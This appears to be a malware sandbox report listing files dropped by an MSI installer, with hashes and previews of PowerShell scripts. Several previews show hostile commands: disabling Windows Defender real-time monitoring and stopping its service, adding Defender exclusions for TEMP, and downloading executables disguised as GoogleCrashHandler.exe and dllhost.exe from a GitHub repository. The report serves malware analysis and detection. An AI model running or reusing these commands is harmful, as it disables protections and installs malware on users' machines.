                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkzkncje.ypf.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj2lxxxi.z01.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhq5fw5d.fxl.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\pss1D88.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):22436
                                                                                              Entropy (8bit):4.044534794608738
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:5wbdTiffsJv5H9xJPjWzC6k4/H+6jNlt7++GcOSvG:5wbdmnsJv5TJPa1Z+6JlxPu
                                                                                              MD5:022A3ED9725E7EF1E8B65675C7BD5BF6
                                                                                              SHA1:8E19F83EEF5882CD9DDB39182FE886F0148D074D
                                                                                              SHA-256:11E98833B9A3F504688B69EBF521E1ED6A12E6849C3277457127414B7EB1DC91
                                                                                              SHA-512:3E4F298B567CD4AA90CA07DFAE8E99CF30F820EDD46F67BB1539DC8BC41D69912EE62BDE309C8ED451AC5F62B3E86F91BF9A74A1BA97AB14A819A83F3F733861
                                                                                              Malicious:true
                                                                                              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\pss3EE5.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):5424
                                                                                              Entropy (8bit):3.4815517571235803
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:5wb5jTmmywV2BVrIovmkitxzj6BngOcvjb:5wbdTif/nsJvb
                                                                                              MD5:8F69DA7A9F4B3C2D0F423583B262ED49
                                                                                              SHA1:B6D2CEB18FE78D279F76F412E4660BFF5F6A88C7
                                                                                              SHA-256:DC6B6E1812F41C80EE67A72EBCB7A999488C866D805354936FB7506667005B43
                                                                                              SHA-512:71782D54137E87EC8D4311ADF83B9B269AADFCBA55B753CE8562D0FE74CC95F00118B01F3139B8FF0A142156D6461BECECFC38380E9ACD0C117B2FFF0E846EDF
                                                                                              Malicious:false
                                                                                              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\pss7419.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):22436
                                                                                              Entropy (8bit):4.038367490477265
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:5wbdTiffsJv7H9xJPjWzCY4/zPyL87G1eY7rTiGh:5wbdmnsJv7TJPa2PyiG1B7niE
                                                                                              MD5:84C77695AB7C6409FFBDDC468CF9E706
                                                                                              SHA1:6592D7F6105E08CC6366182A59BB0068FA85A481
                                                                                              SHA-256:7ADB60E0FEED7786487A77CC486E2B2E0F6FF8D48FD29F945F6ECA282B0B7BBF
                                                                                              SHA-512:84874A240998740386C1F035980369C068BB92BF6098DF77021FB0D78847757A4EF08E9A8C08950E56345E0077AEEC365DB12069E5832091334B098C5BE72C11
                                                                                              Malicious:false
                                                                                              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\pssA352.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):5424
                                                                                              Entropy (8bit):3.4815517571235803
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:5wb5jTmmywV2BVrIovmkitxzj6BngOcvjb:5wbdTif/nsJvb
                                                                                              MD5:8F69DA7A9F4B3C2D0F423583B262ED49
                                                                                              SHA1:B6D2CEB18FE78D279F76F412E4660BFF5F6A88C7
                                                                                              SHA-256:DC6B6E1812F41C80EE67A72EBCB7A999488C866D805354936FB7506667005B43
                                                                                              SHA-512:71782D54137E87EC8D4311ADF83B9B269AADFCBA55B753CE8562D0FE74CC95F00118B01F3139B8FF0A142156D6461BECECFC38380E9ACD0C117B2FFF0E846EDF
                                                                                              Malicious:false
                                                                                              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\pssE5D4.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):5424
                                                                                              Entropy (8bit):3.4815517571235803
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:5wb5jTmmywV2BVrIovmkitxzj6BngOcvjb:5wbdTif/nsJvb
                                                                                              MD5:8F69DA7A9F4B3C2D0F423583B262ED49
                                                                                              SHA1:B6D2CEB18FE78D279F76F412E4660BFF5F6A88C7
                                                                                              SHA-256:DC6B6E1812F41C80EE67A72EBCB7A999488C866D805354936FB7506667005B43
                                                                                              SHA-512:71782D54137E87EC8D4311ADF83B9B269AADFCBA55B753CE8562D0FE74CC95F00118B01F3139B8FF0A142156D6461BECECFC38380E9ACD0C117B2FFF0E846EDF
                                                                                              Malicious:false
                                                                                              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\scr1D28.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):22140
                                                                                              Entropy (8bit):4.042327314605032
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:z0dQv6mBq+Dqxq+SV9xJPjWzC6kwUk+6jNlt7++GcOSmP:7lDagJPa1Dd+6JlxPmP
                                                                                              MD5:BD2E05FC2F07E8345828CD1235912779
                                                                                              SHA1:00C3BF62CE0FBB3B3A4AD108E34251D3EF65F8CD
                                                                                              SHA-256:82042AF264BCD29489C2321C8EDB60EC772B1E3B5F6B7BD70061D7209EAF9EBB
                                                                                              SHA-512:ED76F0E0F84E70321DE2F873CA980E86E6EC0448D79F337AFF2637C50216342DAAD3A60BD5E351E6AB481C65E646F8D3F7EDD2732E400CA263C7A38087F60ACF
                                                                                              Malicious:true
                                                                                              Preview:..#.D.i.s.a.b.l.e. .M.e.t.h.o.d. .1.....S.e.t.-.M.p.P.r.e.f.e.r.e.n.c.e. .-.D.i.s.a.b.l.e.I.n.t.r.u.s.i.o.n.P.r.e.v.e.n.t.i.o.n.S.y.s.t.e.m. .$.t.r.u.e. .-.D.i.s.a.b.l.e.I.O.A.V.P.r.o.t.e.c.t.i.o.n. .$.t.r.u.e. .-.D.i.s.a.b.l.e.R.e.a.l.t.i.m.e.M.o.n.i.t.o.r.i.n.g. .$.t.r.u.e. .-.D.i.s.a.b.l.e.S.c.r.i.p.t.S.c.a.n.n.i.n.g. .$.t.r.u.e. .-.E.n.a.b.l.e.C.o.n.t.r.o.l.l.e.d.F.o.l.d.e.r.A.c.c.e.s.s. .D.i.s.a.b.l.e.d. .-.E.n.a.b.l.e.N.e.t.w.o.r.k.P.r.o.t.e.c.t.i.o.n. .A.u.d.i.t.M.o.d.e. .-.F.o.r.c.e. .-.M.A.P.S.R.e.p.o.r.t.i.n.g. .D.i.s.a.b.l.e.d. .-.S.u.b.m.i.t.S.a.m.p.l.e.s.C.o.n.s.e.n.t. .N.e.v.e.r.S.e.n.d.....#.D.i.s.a.b.l.e. .M.e.t.h.o.d. .2.....G.e.t.-.S.e.r.v.i.c.e. .W.i.n.D.e.f.e.n.d. .|. .S.t.o.p.-.S.e.r.v.i.c.e. .-.P.a.s.s.T.h.r.u. .|. .S.e.t.-.S.e.r.v.i.c.e. .-.S.t.a.r.t.u.p.T.y.p.e. .D.i.s.a.b.l.e.d.....#.D.i.s.a.b.l.e. .M.e.t.h.o.d. .3.....S.e.t.-.M.p.P.r.e.f.e.r.e.n.c.e. .-.D.i.s.a.b.l.e.R.e.a.l.t.i.m.e.M.o.n.i.t.o.r.i.n.g. .$.t.r.u.e.....#.D.i.s.a.b.l.e. .M.e.t.h.o.d. .4.....s.c.

                                                                                              C:\Users\user\AppData\Local\Temp\scr3EB5.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):262
                                                                                              Entropy (8bit):3.4825781333636545
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:QsIlOufaeNeYSDEyKtlWmAlMawoKclJs9kXQxWl17Nqfkrgmwo/xWl17l:Q3fd9SDEzGMa6Awxi104Fl/xi1h
                                                                                              MD5:9FEC36FE6FC8DCE6F089FBE2FDF4B02C
                                                                                              SHA1:08AD4924B3CA240746DD1A0A117CC9B2FAF58089
                                                                                              SHA-256:D102E8CBD0493547320525E606DEE599B5E1FEBEA149E63830CAE07B69DF1186
                                                                                              SHA-512:7681D60FBEB2EB90261C6CB38E2EB0AA4079FEF2DB08AB902E60E5672B08E695B697F5EE8BAD12D825ED7F07BCBB03B746E6A205DC4D1A14C1B9C33962863120
                                                                                              Malicious:false
                                                                                              Preview:..I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .h.t.t.p.s.:././.g.i.t.h.u.b...c.o.m./.g.o.w.g.e.r.r.i.e./.r.e.b.o.r.n./.r.a.w./.m.a.i.n./.0.4./.G.o.o.g.l.e.C.r.a.s.h.H.a.n.d.l.e.r...e.x.e. .-.O.u.t.F.i.l.e. .$.e.n.v.:.T.E.M.P./.G.o.o.g.l.e.C.r.a.s.h.H.a.n.d.l.e.r...e.x.e.

                                                                                              C:\Users\user\AppData\Local\Temp\scr73B9.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):17210
                                                                                              Entropy (8bit):3.996739871977085
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:HhD9xJPjWzCYaIJUDBPyL87G1eY7rTinBV:HhXJPafMBPyiG1B7niD
                                                                                              MD5:63C8D26EF49B30B9EF4212B5D8252C74
                                                                                              SHA1:5767B5A9BA7C4BFCF5817F0E9F6F86E8805CEA95
                                                                                              SHA-256:F99D4E2FA6895F95FCFC2C79C94C047CDF95C5EBCB0C7D38FEEDB3B9055FD0DB
                                                                                              SHA-512:9F7494DCA8A263EB78F4720C19457D2C9A13888AE95A5984AED48B798CC48B1CCE85F0E631C657D009F1F99192A8DEAC21BE8723DF8FC966BDE5094D3772E09C
                                                                                              Malicious:false
                                                                                              Preview:..P.a.r.a.m.(.$.a.p.p.d.i.r.).....A.d.d.-.M.p.P.r.e.f.e.r.e.n.c.e. .-.E.x.c.l.u.s.i.o.n.P.a.t.h. .$.e.n.v.:.T.E.M.P.....A.d.d.-.M.p.P.r.e.f.e.r.e.n.c.e. .-.E.x.c.l.u.s.i.o.n.P.a.t.h. .$.a.p.p.d.i.r.....#. .S.I.G. .#. .B.e.g.i.n. .s.i.g.n.a.t.u.r.e. .b.l.o.c.k.....#. .M.I.I.X.Q.A.Y.J.K.o.Z.I.h.v.c.N.A.Q.c.C.o.I.I.X.M.T.C.C.F.y.0.C.A.Q.E.x.D.z.A.N.B.g.l.g.h.k.g.B.Z.Q.M.E.A.g.E.F.A.D.B.5.B.g.o.r.....#. .B.g.E.E.A.Y.I.3.A.g.E.E.o.G.s.w.a.T.A.0.B.g.o.r.B.g.E.E.A.Y.I.3.A.g.E.e.M.C.Y.C.A.w.E.A.A.A.Q.Q.H.8.w.7.Y.F.l.L.C.E.6.3.J.N.L.G.....#. .K.X.7.z.U.Q.I.B.A.A.I.B.A.A.I.B.A.A.I.B.A.A.I.B.A.D.A.x.M.A.0.G.C.W.C.G.S.A.F.l.A.w.Q.C.A.Q.U.A.B.C.B.W.d.a.V.k.Z.+.Q.m.s.i.N.B.....#. .d.7.g.q.7.+.s.f.s.7.o.X.D.e.6.A.k.M.x.W.a.F.E.D.7.N.P.9.1.K.C.C.B.a.k.w.g.g.W.l.M.I.I.D.j.Q.I.U.V.W.K.x.k.f.u.d.f.F.a.P.K.t.V.R.....#. .R.A.z.r.Z.J.w.p.8./.4.w.D.Q.Y.J.K.o.Z.I.h.v.c.N.A.Q.E.L.B.Q.A.w.g.Y.4.x.C.z.A.J.B.g.N.V.B.A.Y.T.A.l.V.T.M.R.A.w.D.g.Y.D.V.Q.Q.I.....#. .D.A.d.G.b.G.9.y.a.W.R.h.M.R.A.w.D.g.Y.D.V.Q.Q.H.D.A.

                                                                                              C:\Users\user\AppData\Local\Temp\scr73BA.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):116
                                                                                              Entropy (8bit):3.2649012561202397
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:QLQ3FnSPeL1QNuVdhOEjlpQlyEXlxlXVl5JYRlFlsWjn:QLQ3M/QXUEZ+lX10bsW7
                                                                                              MD5:FB0627955CF68A374448874AB220E2C6
                                                                                              SHA1:ED13202B4397CAE2C41FF7F4506F25D2ED2FFD2A
                                                                                              SHA-256:B7A8D3E6FF1122E71BB0E313AF273211A477A6825503DD26B6F87015250D1CAC
                                                                                              SHA-512:EB36C21C2C6D4EBE2587DFE062DE8AC995EE2A0DA7D9B098852D209FDA2BD1EE8213E763D69219A4DCE5742D82DBB26D3649A9A9B08B5DBD58D073990EA9B9F9
                                                                                              Malicious:false
                                                                                              Preview:..-.a.p.p.d.i.r. .".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.C.o.m.m.o.n. .A.p.p.s.\.".

                                                                                              C:\Users\user\AppData\Local\Temp\scrA311.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):270
                                                                                              Entropy (8bit):3.510058638564386
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:QsIlOufaeNeYSDEyKtlWmAlMawoKclJs9kXQxWl1E6Nqfkrgmwo/xWl1E6l:Q3fd9SDEzGMa6Awxi124Fl/xi1b
                                                                                              MD5:03D68D22E285ED97B303DF8FB712B9A1
                                                                                              SHA1:A1B4B87012517329A040B0DE13DF14EC2EEA7FD1
                                                                                              SHA-256:7C480D442815E479779054A8CA74114F013BFB7E7F26D92212E013A494E2BF37
                                                                                              SHA-512:D6538CA94AA89A821BCC28BA879069A702F232DA652861C21233A83C602444FC209B898483C3D43E31696958AC27E4BDA4E415411168F7A2F87D74AF673A2C37
                                                                                              Malicious:false
                                                                                              Preview:..I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .h.t.t.p.s.:././.g.i.t.h.u.b...c.o.m./.g.o.w.g.e.r.r.i.e./.r.e.b.o.r.n./.r.a.w./.m.a.i.n./.0.4./.G.o.o.g.l.e.C.r.a.s.h.H.a.n.d.l.e.r.6.4...e.x.e. .-.O.u.t.F.i.l.e. .$.e.n.v.:.T.E.M.P./.G.o.o.g.l.e.C.r.a.s.h.H.a.n.d.l.e.r.6.4...e.x.e.

                                                                                              C:\Users\user\AppData\Local\Temp\scrE5A3.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):218
                                                                                              Entropy (8bit):3.4731482261489885
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:QsIlOufaeNeYSDEyKtlWmAlMawoKclJs9ktulLANqfkrgmw9ulLAl:Q3fd9SDEzGMa6Asx4Fh6
                                                                                              MD5:1574465EC30AD6E3E490BFFCD4294E04
                                                                                              SHA1:9C4C0730E3AA0F3CD0EFE1C186AE8A99732EC7B5
                                                                                              SHA-256:0D7BECC3031F5F3A86FE430DCA5E73B8CE566B444AE82255395E6C236BBF271C
                                                                                              SHA-512:470687ABE95EA216636C46D035E70FC0A8441893A400A64A4AC120C294A627698D0D0FAF94ED6180B72A80789931F87C01DF4BEAF65CDD8FFFDA85F95B2DF037
                                                                                              Malicious:false
                                                                                              Preview:..I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .h.t.t.p.s.:././.g.i.t.h.u.b...c.o.m./.g.o.w.g.e.r.r.i.e./.r.e.b.o.r.n./.r.a.w./.m.a.i.n./.0.4./.d.l.l.h.o.s.t...e.x.e. .-.O.u.t.F.i.l.e. .$.e.n.v.:.T.E.M.P./.d.l.l.h.o.s.t...e.x.e.

                                                                                              C:\Users\user\AppData\Local\Temp\shi4BB.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):4504064
                                                                                              Entropy (8bit):6.101321610477592
                                                                                              Encrypted:false
                                                                                              SSDEEP:98304:/iVAwiMj328++M3VvGP6hMmXem6OXdJWS1:MAwi8m7j3VvGPUMmXem6OXdJWS
                                                                                              MD5:6DC5190BE6C69820DED055AB516CB896
                                                                                              SHA1:CB1DE7F906B9AFF5FB8EE3CED99771CB79F4DA38
                                                                                              SHA-256:7FCCBE248C14040873504EF65B8DA183DF37EAC021DE2869BA4E95A198B70585
